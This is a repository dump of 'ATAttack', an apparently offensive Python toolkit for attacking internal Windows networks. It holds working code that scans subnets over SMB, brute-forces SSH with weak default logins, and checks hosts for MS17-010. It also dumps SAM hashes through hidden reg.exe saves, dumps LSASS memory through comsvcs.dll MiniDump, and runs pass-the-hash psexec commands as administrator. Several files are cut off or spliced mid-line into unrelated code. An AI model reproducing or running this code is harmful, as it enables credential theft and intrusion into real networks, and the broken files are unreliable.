├── .DS_Store
├── .idea
├── ATAttack.iml
├── encodings.xml
├── misc.xml
├── modules.xml
├── vcs.xml
└── workspace.xml
├── ATAttack
├── __init__.py
├── __init__.pyc
├── credentials
│ ├── __init__.py
│ ├── check.py
│ ├── dump.py
│ ├── example.py
│ ├── psexec.py
│ └── yhzldb.py
├── enumeration
│ ├── __init__.py
│ ├── check.py
│ ├── connect.py
│ ├── host.py
│ ├── tasklist.py
│ └── upload.py
└── framework
│ ├── __init__.py
│ ├── addrspace.py
│ ├── constant.py
│ ├── newobj.py
│ ├── object.py
│ ├── prints.py
│ ├── types.py
│ └── win32
│ ├── __init__.py
│ ├── __init__.pyc
│ ├── domcachedump.py
│ ├── hashdump.py
│ ├── hashdump.pyc
│ ├── lsasecrets.py
│ ├── rawreg.py
│ └── rawreg.pyc
├── README.md
├── doc
└── snapshot.jpg
├── exploit.exe
├── exploit.py
├── exploit.pyc
├── exploit.spec
├── http_client.py
├── http_server.py
├── requirements.txt
└── upx-3.95-win64
├── BUGS
├── COPYING
├── LICENSE
├── NEWS
├── README
├── README.1ST
├── THANKS
├── upx.1
├── upx.doc
├── upx.exe
└── upx.html
/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c1y2m3/ATAttack/b3df31d57061900246ab68ba240b26a42a02002c/.DS_Store
--------------------------------------------------------------------------------
/.idea/ATAttack.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/ATAttack/__init__.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python2.7
2 | # -*- coding: utf-8 -*-
3 |
4 | import sys,os
5 | BASE_DIR=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
6 | sys.path.append(BASE_DIR)
7 |
--------------------------------------------------------------------------------
/ATAttack/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c1y2m3/ATAttack/b3df31d57061900246ab68ba240b26a42a02002c/ATAttack/__init__.pyc
--------------------------------------------------------------------------------
/ATAttack/credentials/__init__.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python2.7
2 | # -*- coding: utf-8 -*-
3 |
4 | import sys,os
5 | BASE_DIR=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
6 | sys.path.append(BASE_DIR)
7 |
--------------------------------------------------------------------------------
/ATAttack/credentials/check.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python2.7
2 | # -*- coding: utf-8 -*-
3 |
4 |
5 | import socket
6 | import threading
7 | import struct
8 | import paramiko
9 | from functools import reduce
10 | from ATAttack.credentials.yhzldb import check_ip
11 | from ATAttack.credentials.example import psexec
12 | from ATAttack.framework.constant import constant
13 | from ATAttack.framework.prints import print_success
14 |
15 |
16 | threads = 150
17 | threads_num = int(threads)
18 | semaphore = threading.BoundedSemaphore(value=threads_num)
19 | print_lock = threading.Lock()
20 | version = []
21 |
22 |
23 | class ipadders():
24 |
25 | def __init__(self):
26 | pass
27 |
28 | def ip_into_int(self, ip):
29 | # 先把 192.168.1.13 变成16进制的 c0.a8.01.0d ,再去了“.”后转成10进制的 3232235789 即可。
30 | # (((((192 * 256) + 168) * 256) + 1) * 256) + 13
31 | return reduce(lambda x, y: (x << 8) + y, map(int, ip.split('.')))
32 |
33 | def is_internal_ip(self, ip):
34 | ip = self.ip_into_int(ip)
35 | net_a = self.ip_into_int('10.255.255.255') >> 24
36 | net_b = self.ip_into_int('172.31.255.255') >> 20
37 | net_c = self.ip_into_int('192.168.255.255') >> 16
38 | return ip >> 24 == net_a or ip >> 20 == net_b or ip >> 16 == net_c
39 |
40 | class attak():
41 |
42 | def __init__(self):
43 | self.port = int(22)
44 | self.timeout = 5
45 | self.DIC_USER = ['root', 'oracle', ]
46 | self.DIC_PASSWD = ['root', 'oracle',]
47 |
48 | def _check(self,ip):
49 | try:
50 | host_name, group_type = self._get_host_name(str(ip))
51 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
52 | s.settimeout(1)
53 | s.connect((ip, 445))
54 | payload1 = b'\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00'
55 | payload2 = b'\x00\x00\x01\x0a\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00\x0c\xff\x00\x0a\x01\x04\x41\x32\x00\x00\x00\x00\x00\x00\x00\x4a\x00\x00\x00\x00\x00\xd4\x00\x00\xa0\xcf\x00\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\xce\x0e\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x20\x00\x32\x00\x30\x00\x30\x00\x33\x00\x20\x00\x33\x00\x37\x00\x39\x00\x30\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x32\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x20\x00\x32\x00\x30\x00\x30\x00\x33\x00\x20\x00\x35\x00\x2e\x00\x32\x00\x00\x00\x00\x00'
56 | s.send(payload1)
57 | s.recv(1024)
58 | s.send(payload2)
59 | ret = s.recv(1024)
60 | s.close()
61 | length = ord(ret[43:44]) + ord(ret[44:45]) * 256
62 | os_version = ret[47 + length:]
63 | result = ip + ":" + "\\\\" + host_name + " OS:" + os_version
64 | version.append(result)
65 | for os in version:
66 | with open(constant.tmp_name__, "a") as file:
67 | file.writelines(os + '\n')
68 | file.close()
69 | return ip, result
70 | except Exception:
71 | pass
72 |
73 | def _get_host_name(self,ip):
74 | host_name = ""
75 | group_type = ""
76 | host_name_type = ""
77 | data = b'ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01'
78 | try:
79 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
80 | s.settimeout(2)
81 | s.sendto(data, (ip, 137))
82 | recv = s.recv(2000)
83 | if isinstance(recv, str):
84 | recv = bytes(recv)
85 | num = ord(recv[56:57].decode())
86 | recv = recv[57:]
87 | s.close()
88 | for i in range(num):
89 | name = recv[18 * i:18 * i + 15].decode()
90 | if str(name).strip() not in host_name_type:
91 | host_name_type = host_name_type + str(name).strip() + "\\"
92 | host_name = host_name_type.split('\\')[0]
93 | group_type = host_name_type.split('\\')[1]
94 | return host_name, group_type
95 | except BaseException:
96 | return host_name, group_type
97 |
98 | def ip2Int(self,network):
99 |
100 | (ip, cidr) = network.split('/')
101 | cidr = int(cidr)
102 | host_bits = 32 - cidr
103 | i = struct.unpack('>I', socket.inet_aton(ip))[0] # note the endianness
104 | start = (i >> host_bits) << host_bits # clear the host bits
105 | end = i | ((1 << host_bits) - 1)
106 | return start,end
107 |
108 | def _thread(self,ip_address,dump):
109 | global semaphore
110 | try:
111 | self._creakssh(ip_address)
112 | ipadder, result = self._check(ip_address)
113 | if ipadder is not None:
114 | check_ip(ipadder)
115 | psexec('whoami', ipadder, dump, None)
116 | except Exception:
117 | with print_lock:
118 | pass
119 | finally:
120 | semaphore.release()
121 |
122 | def smb_version(self,network,dump):
123 | start,end = self.ip2Int(network)
124 | for i in range(start + 1, end):
125 | semaphore.acquire()
126 | t = threading.Thread(
127 | target=self._thread, args=(socket.inet_ntoa(struct.pack('>I', i)),dump))
128 | t.start()
129 |
130 | def _creakssh(self,host):
131 | try:
132 | ssh = paramiko.SSHClient()
133 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
134 | ssh.connect(host, self.port, '', '',timeout=self.timeout)
135 | ssh.close()
136 | except Exception as e:
137 | if 'Authentication' in str(e):
138 | for user in self.DIC_USER:
139 | for pwd in self.DIC_PASSWD:
140 | try:
141 | ssh.connect(host, self.port, user, pwd, timeout=3)
142 | print_success(host + " ssh Weak account: {user}:{passwd}".format(user=user, passwd=pwd))
143 | ssh.close()
144 | break
145 | except Exception as e:
146 | pass
147 | ssh.close()
148 |
--------------------------------------------------------------------------------
/ATAttack/credentials/dump.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 |
4 | from ATAttack.framework.win32.hashdump import dump_file_hashes
5 | from ATAttack.framework.constant import constant
6 | import subprocess
7 | import os
8 | import wget
9 | import re
10 |
11 | try:
12 | import _subprocess as sub
13 | STARTF_USESHOWWINDOW = sub.STARTF_USESHOWWINDOW
14 | SW_HIDE = sub.SW_HIDE
15 | except ImportError:
16 | STARTF_USESHOWWINDOW = subprocess.STARTF_USESHOWWINDOW
17 | SW_HIDE = subprocess.SW_HIDE
18 |
19 | class samdump:
20 |
21 | def __init__(self):
22 | pass
23 |
24 | def save_hives(self):
25 | """
26 | Save SAM Hives
27 | """
28 | sammhives = []
29 | try:
30 | for h in constant.hives:
31 | if not os.path.exists(constant.hives[h]):
32 | cmdline = r'reg.exe save hklm\%s %s' % (
33 | h, constant.hives[h])
34 | command = ['cmd.exe', '/c', cmdline]
35 | info = subprocess.STARTUPINFO()
36 | info.dwFlags = STARTF_USESHOWWINDOW
37 | info.wShowWindow = SW_HIDE
38 | p = subprocess.Popen(
39 | command,
40 | startupinfo=info,
41 | stdin=subprocess.PIPE,
42 | stderr=subprocess.STDOUT,
43 | stdout=subprocess.PIPE,
44 | universal_newlines=True)
45 | results, _ = p.communicate()
46 | sammhives.append(constant.hives[h])
47 | ntlm = dump_file_hashes(sammhives[0], sammhives[1])
48 | # lsass_dump()
49 | return ntlm[0]
50 | except BaseException: # Catch all kind of exceptions
51 | pass
52 | finally:
53 | self.delete_hives()
54 |
55 | def delete_hives(self):
56 | """
57 | Delete SAM Hives
58 | """
59 | # Try to remove all temporary files
60 | for h in constant.hives:
61 | if os.path.exists(constant.hives[h]):
62 | try:
63 | os.remove(constant.hives[h])
64 | except Exception:
65 | pass
66 |
67 | def lsassdump(self):
68 |
69 | tasklist = os.popen('tasklist /svc | findstr lsass.exe').read()
70 | regex = re.findall(r'\d+', tasklist, re.S)
71 | payload = r'powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump {} {} full"'.format(
72 | regex[0], constant.dump_name)
73 | os.popen(payload)
74 | # try:
75 | # wget.download(url=constant.pyurl,out=constant.pyexe)
76 | # payload1 = '{exe} "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit > {file}'.format(exe=constant.pyexe,file=constant.pyname)
77 | # os.popen(payload1)
78 | # print("lsass.exe process to Sucessfull")
79 | # except:
80 | # pass
--------------------------------------------------------------------------------
/ATAttack/credentials/example.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python2.7
2 | # -*- coding: utf-8 -*-
3 |
4 | # import smbexec
5 | from psexec import PSEXEC
6 | # import multiprocessing
7 | from ATAttack.framework.constant import constant
8 |
9 |
10 | # def smbexec(command, target, ntlmhash):
11 | # try:
12 | # executer = smbexec.CMDEXEC(
13 | # "445/SMB",
14 | # username=constant.username,
15 | # domain='',
16 | # hashes=constant.lmhash.format(ntlmhash),
17 | # mode="SHARE",
18 | # share="C$",
19 | # serviceName=None)
20 | # exdb = executer.run(target, command)
21 | # return exdb
22 | # except Exception :
23 | # pass
24 |
25 | def psexec(command,target, ntlmhash,File):
26 | try:
27 | objes = PSEXEC(
28 | command,
29 | "c:\\windows\\system32\\",
30 | exeFile=None,
31 | copyFile=File,
32 | username="administrator",
33 | hashes=constant.lmhash.format(ntlmhash))
34 | objes.run(target)
35 | except Exception :
36 | pass
37 |
--------------------------------------------------------------------------------
/ATAttack/credentials/psexec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # Copyright (c) 2003-2016 CORE Security Technologies
3 | #
4 | # This software is provided under under a slightly modified version
5 | # of the Apache Software License. See the accompanying LICENSE file
6 | # for more information.
7 | #
8 | # PSEXEC like functionality example using RemComSvc (https://github.com/kavika13/RemCom)
9 | #
10 | # Author:
11 | # beto (@agsolino)
12 | #
13 | # Reference for:
14 | # DCE/RPC and SMB.
15 |
16 | import sys
17 | import os
18 | import cmd
19 | import logging
20 | from threading import Thread, Lock
21 | import argparse
22 | import random
23 | import string
24 | import time
25 |
26 | from impacket.examples import logger
27 | from impacket import version, smb
28 | from impacket.smbconnection import SMBConnection
29 | from impacket.dcerpc.v5 import transport
30 | from impacket.structure import Structure
31 | from impacket.examples import remcomsvc, serviceinstall
32 |
33 |
34 | class RemComMessage(Structure):
35 | structure = (
36 | ('Command','4096s=""'),
37 | ('WorkingDir','260s=""'),
38 | ('Priority',' 0:
105 | try:
106 | s.waitNamedPipe(tid,pipe)
107 | pipeReady = True
108 | except:
109 | tries -= 1
110 | time.sleep(2)
111 | pass
112 |
113 | if tries == 0:
114 | # logging.critical('Pipe not ready, aborting')
115 | pass
116 | raise
117 |
118 | fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80)
119 |
120 | return fid
121 |
122 | def doStuff(self, rpctransport):
123 |
124 | dce = rpctransport.get_dce_rpc()
125 | try:
126 | dce.connect()
127 | except Exception, e:
128 | pass
129 | sys.exit(1)
130 | global dialect
131 | dialect = rpctransport.get_smb_connection().getDialect()
132 |
133 | try:
134 | unInstalled = False
135 | s = rpctransport.get_smb_connection()
136 |
137 | # We don't wanna deal with timeouts from now on.
138 | s.setTimeout(100000)
139 | if self.__exeFile is None:
140 | installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc())
141 | else:
142 | try:
143 | f = open(self.__exeFile)
144 | except Exception, e:
145 | pass
146 | sys.exit(1)
147 | installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), f)
148 |
149 | installService.install()
150 |
151 | if self.__exeFile is not None:
152 | f.close()
153 |
154 | # Check if we need to copy a file for execution
155 | if self.__copyFile is not None:
156 | installService.copy_file(self.__copyFile, installService.getShare(), os.path.basename(self.__copyFile))
157 | # And we change the command to be executed to this filename
158 | self.__command = os.path.basename(self.__copyFile) + ' ' + self.__command
159 |
160 | tid = s.connectTree('IPC$')
161 | fid_main = self.openPipe(s,tid,'\RemCom_communicaton',0x12019f)
162 |
163 | packet = RemComMessage()
164 | pid = os.getpid()
165 |
166 | packet['Machine'] = ''.join([random.choice(string.letters) for _ in range(4)])
167 | if self.__path is not None:
168 | packet['WorkingDir'] = self.__path
169 | packet['Command'] = self.__command
170 | packet['ProcessID'] = pid
171 |
172 | s.writeNamedPipe(tid, fid_main, str(packet))
173 |
174 | # Here we'll store the command we type so we don't print it back ;)
175 | # ( I know.. globals are nasty :P )
176 | global LastDataSent
177 | LastDataSent = ''
178 |
179 | # Create the pipes threads
180 | stdin_pipe = RemoteStdInPipe(rpctransport,
181 | '\%s%s%d' % (RemComSTDIN, packet['Machine'], packet['ProcessID']),
182 | smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, installService.getShare())
183 | stdin_pipe.start()
184 | stdout_pipe = RemoteStdOutPipe(rpctransport,
185 | '\%s%s%d' % (RemComSTDOUT, packet['Machine'], packet['ProcessID']),
186 | smb.FILE_READ_DATA)
187 | stdout_pipe.start()
188 | stderr_pipe = RemoteStdErrPipe(rpctransport,
189 | '\%s%s%d' % (RemComSTDERR, packet['Machine'], packet['ProcessID']),
190 | smb.FILE_READ_DATA)
191 | stderr_pipe.start()
192 |
193 | # And we stay here till the end
194 | ans = s.readNamedPipe(tid,fid_main,8)
195 |
196 | if len(ans):
197 | retCode = RemComResponse(ans)
198 | # logging.info("Process %s finished with ErrorCode: %d, ReturnCode: %d" % (
199 | # self.__command, retCode['ErrorCode'], retCode['ReturnCode']))
200 | installService.uninstall()
201 | if self.__copyFile is not None:
202 | # We copied a file for execution, let's remove it
203 | s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))
204 | unInstalled = True
205 | sys.exit(retCode['ErrorCode'])
206 |
207 | except SystemExit:
208 | raise
209 | except:
210 | if unInstalled is False:
211 | installService.uninstall()
212 | if self.__copyFile is not None:
213 | s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))
214 | sys.stdout.flush()
215 | sys.exit(1)
216 |
217 | class Pipes(Thread):
218 | def __init__(self, transport, pipe, permissions, share=None):
219 | Thread.__init__(self)
220 | self.server = 0
221 | self.transport = transport
222 | self.credentials = transport.get_credentials()
223 | self.tid = 0
224 | self.fid = 0
225 | self.share = share
226 | self.port = transport.get_dport()
227 | self.pipe = pipe
228 | self.permissions = permissions
229 | self.daemon = True
230 |
231 | def connectPipe(self):
232 | try:
233 | lock.acquire()
234 | global dialect
235 | #self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
236 | self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(),
237 | sess_port=self.port, preferredDialect=dialect)
238 | user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
239 | if self.transport.get_kerberos() is True:
240 | self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, kdcHost=self.transport.get_kdcHost(), TGT=TGT, TGS=TGS)
241 | else:
242 | self.server.login(user, passwd, domain, lm, nt)
243 | lock.release()
244 | self.tid = self.server.connectTree('IPC$')
245 |
246 | self.server.waitNamedPipe(self.tid, self.pipe)
247 | self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)
248 | self.server.setTimeout(1000000)
249 | except:
250 | pass
251 |
252 |
253 | class RemoteStdOutPipe(Pipes):
254 | def __init__(self, transport, pipe, permisssions):
255 | Pipes.__init__(self, transport, pipe, permisssions)
256 |
257 | def run(self):
258 | self.connectPipe()
259 | while True:
260 | try:
261 | ans = self.server.readFile(self.tid,self.fid, 0, 1024)
262 | except:
263 | pass
264 | else:
265 | try:
266 | global LastDataSent
267 | if ans != LastDataSent:
268 | sys.stdout.write(ans.decode('cp437'))
269 | sys.stdout.flush()
270 | else:
271 | # Don't echo what I sent, and clear it up
272 | LastDataSent = ''
273 | # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars,
274 | # it will give false positives tho.. we should find a better way to handle this.
275 | if LastDataSent > 10:
276 | LastDataSent = ''
277 | except:
278 | pass
279 |
280 | class RemoteStdErrPipe(Pipes):
281 | def __init__(self, transport, pipe, permisssions):
282 | Pipes.__init__(self, transport, pipe, permisssions)
283 |
284 | def run(self):
285 | self.connectPipe()
286 | while True:
287 | try:
288 | ans = self.server.readFile(self.tid,self.fid, 0, 1024)
289 | except:
290 | pass
291 | else:
292 | try:
293 | sys.stderr.write(str(ans))
294 | sys.stderr.flush()
295 | except:
296 | pass
297 |
298 | class RemoteShell(cmd.Cmd):
299 | def __init__(self, server, port, credentials, tid, fid, share, transport):
300 | cmd.Cmd.__init__(self, False)
301 | self.prompt = '\x08'
302 | self.server = server
303 | self.transferClient = None
304 | self.tid = tid
305 | self.fid = fid
306 | self.credentials = credentials
307 | self.share = share
308 | self.port = port
309 | self.transport = transport
310 | self.intro = "{} Attempt to succeed in PTH attack....".format(self.server.getRemoteHost())
311 |
312 | def connect_transferClient(self):
313 | #self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
314 | self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port=self.port,
315 | preferredDialect=dialect)
316 | user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
317 | if self.transport.get_kerberos() is True:
318 | self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey,
319 | kdcHost=self.transport.get_kdcHost(), TGT=TGT, TGS=TGS)
320 | else:
321 | self.transferClient.login(user, passwd, domain, lm, nt)
322 |
323 | def do_help(self, line):
324 | print """
325 | lcd {path} - changes the current local directory to {path}
326 | exit - terminates the server process (and this session)
327 | put {src_file, dst_path} - uploads a local file to the dst_path RELATIVE to the connected share (%s)
328 | get {file} - downloads pathname RELATIVE to the connected share (%s) to the current local dir
329 | ! {cmd} - executes a local shell cmd
330 | """ % (self.share, self.share)
331 | self.send_data('\r\n', False)
332 |
333 | def do_shell(self, s):
334 | os.system(s)
335 | self.send_data('\r\n')
336 |
337 | def do_get(self, src_path):
338 | try:
339 | if self.transferClient is None:
340 | self.connect_transferClient()
341 |
342 | import ntpath
343 | filename = ntpath.basename(src_path)
344 | fh = open(filename,'wb')
345 | logging.info("Downloading %s\%s" % (self.share, src_path))
346 | self.transferClient.getFile(self.share, src_path, fh.write)
347 | fh.close()
348 | except Exception, e:
349 | pass
350 |
351 | self.send_data('\r\n')
352 |
353 | def do_put(self, s):
354 | try:
355 | if self.transferClient is None:
356 | self.connect_transferClient()
357 | params = s.split(' ')
358 | if len(params) > 1:
359 | src_path = params[0]
360 | dst_path = params[1]
361 | elif len(params) == 1:
362 | src_path = params[0]
363 | dst_path = '/'
364 |
365 | src_file = os.path.basename(src_path)
366 | fh = open(src_path, 'rb')
367 | f = dst_path + '/' + src_file
368 | pathname = string.replace(f,'/','\\')
369 | logging.info("Uploading %s to %s\%s" % (src_file, self.share, dst_path))
370 | self.transferClient.putFile(self.share, pathname.decode(sys.stdin.encoding), fh.read)
371 | fh.close()
372 | except Exception, e:
373 | pass
374 |
375 | self.send_data('\r\n')
376 |
377 | def do_lcd(self, s):
378 | if s == '':
379 | print os.getcwd()
380 | else:
381 | os.chdir(s)
382 | self.send_data('\r\n')
383 |
384 | def emptyline(self):
385 | self.send_data('\r\n')
386 | return
387 |
388 | def default(self, line):
389 | self.send_data(line.decode(sys.stdin.encoding).encode('cp437')+'\r\n')
390 |
391 | def send_data(self, data, hideOutput = True):
392 | if hideOutput is True:
393 | global LastDataSent
394 | LastDataSent = data
395 | else:
396 | LastDataSent = ''
397 | self.server.writeFile(self.tid, self.fid, data)
398 |
399 | class RemoteStdInPipe(Pipes):
400 | def __init__(self, transport, pipe, permisssions, share=None):
401 | self.shell = None
402 | Pipes.__init__(self, transport, pipe, permisssions, share)
403 |
404 | def run(self):
405 | try:
406 | self.connectPipe()
407 | self.shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.share, self.transport)
408 | self.shell.cmdloop()
409 | except Exception:
410 | pass
411 |
412 | # Process command-line arguments.
413 | if __name__ == '__main__':
414 | # Init the example's logger theme
415 | logger.init()
416 | print version.BANNER
417 |
418 | parser = argparse.ArgumentParser(add_help = True, description = "PSEXEC like functionality example using RemComSvc.")
419 |
420 | parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')
421 | parser.add_argument('command', nargs='*', default = ' ', help='command (or arguments if -c is used) to execute at the target (w/o path) - (default:cmd.exe)')
422 | parser.add_argument('-c', action='store',metavar = "pathname", help='copy the filename for later execution, arguments are passed in the command option')
423 | parser.add_argument('-path', action='store', help='path of the command to execute')
424 | parser.add_argument('-file', action='store', help="alternative RemCom binary (be sure it doesn't require CRT)")
425 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
426 |
427 | group = parser.add_argument_group('authentication')
428 |
429 | group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
430 | group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
431 | group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
432 | group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
433 | group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter')
434 |
435 | if len(sys.argv)==1:
436 | parser.print_help()
437 | sys.exit(1)
438 |
439 | options = parser.parse_args()
440 |
441 | if options.debug is True:
442 | logging.getLogger().setLevel(logging.DEBUG)
443 | else:
444 | logging.getLogger().setLevel(logging.INFO)
445 |
446 | import re
447 |
448 | domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
449 | options.target).groups('')
450 |
451 | #In case the password contains '@'
452 | if '@' in address:
453 | password = password + '@' + address.rpartition('@')[0]
454 | address = address.rpartition('@')[2]
455 |
456 | if domain is None:
457 | domain = ''
458 |
459 | if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
460 | from getpass import getpass
461 | password = getpass("Password:")
462 |
463 | if options.aesKey is not None:
464 | options.k = True
465 |
466 | command = ' '.join(options.command)
467 | if command == ' ':
468 | command = 'cmd.exe'
469 |
470 | executer = PSEXEC(command, options.path, options.file, options.c, None, username, password, domain, options.hashes,
471 | options.aesKey, options.k, options.dc_ip)
472 | executer.run(address)
473 |
--------------------------------------------------------------------------------
/ATAttack/credentials/yhzldb.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | import binascii
4 | import socket
5 | import struct
6 | import threading
7 |
8 | # more detail: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
9 | # Packets
10 | NEGOTIATE_PROTOCOL_REQUEST = binascii.unhexlify(
11 | "00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
12 | SESSION_SETUP_REQUEST = binascii.unhexlify(
13 | "00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
14 | TREE_CONNECT_REQUEST = binascii.unhexlify(
15 | "00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
16 | NAMED_PIPE_TRANS_REQUEST = binascii.unhexlify(
17 | "0000004aff534d42250000000018012800000000000000000000000000088ea3010852981000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00")
18 |
19 | timeout = 1
20 | threads = 20
21 | verbose = ''
22 | threads_num = int(threads)
23 | semaphore = threading.BoundedSemaphore(value=threads_num)
24 | print_lock = threading.Lock()
25 |
26 |
27 | def print_status(ip, message):
28 | global print_lock
29 |
30 | with print_lock:
31 | print "[*] [%s] %s" % (ip, message)
32 |
33 | def check_ip(ip):
34 | global negotiate_protocol_request, session_setup_request, tree_connect_request, trans2_session_setup, timeout, verbose
35 |
36 | # Connect to socket
37 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
38 | s.settimeout(float(timeout) if timeout else None)
39 | host = ip
40 | port = 445
41 | s.connect((host, port))
42 |
43 | # Send/receive negotiate protocol request
44 | if verbose:
45 | print_status(ip, "Sending negotiation protocol request")
46 | s.send(NEGOTIATE_PROTOCOL_REQUEST)
47 | negotiate_reply = s.recv(1024)
48 | if len(negotiate_reply) < 36 or struct.unpack(
49 | " 0:
124 | paddr = self.vtop(new_vaddr)
125 | if paddr == None and zero:
126 | stuff_read = stuff_read + "\0" * left_over
127 | elif paddr == None:
128 | return None
129 | else:
130 | stuff_read = stuff_read + self.base.read(paddr, left_over)
131 | return stuff_read
132 |
133 | def read_long_phys(self, addr):
134 | string = self.base.read(addr, 4)
135 | (longval, ) = struct.unpack('L', string)
136 | return longval
137 |
138 | def is_valid_address(self, vaddr):
139 | paddr = self.vtop(vaddr)
140 | if not paddr: return False
141 | return self.base.is_valid_address(paddr)
142 |
--------------------------------------------------------------------------------
/ATAttack/framework/constant.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
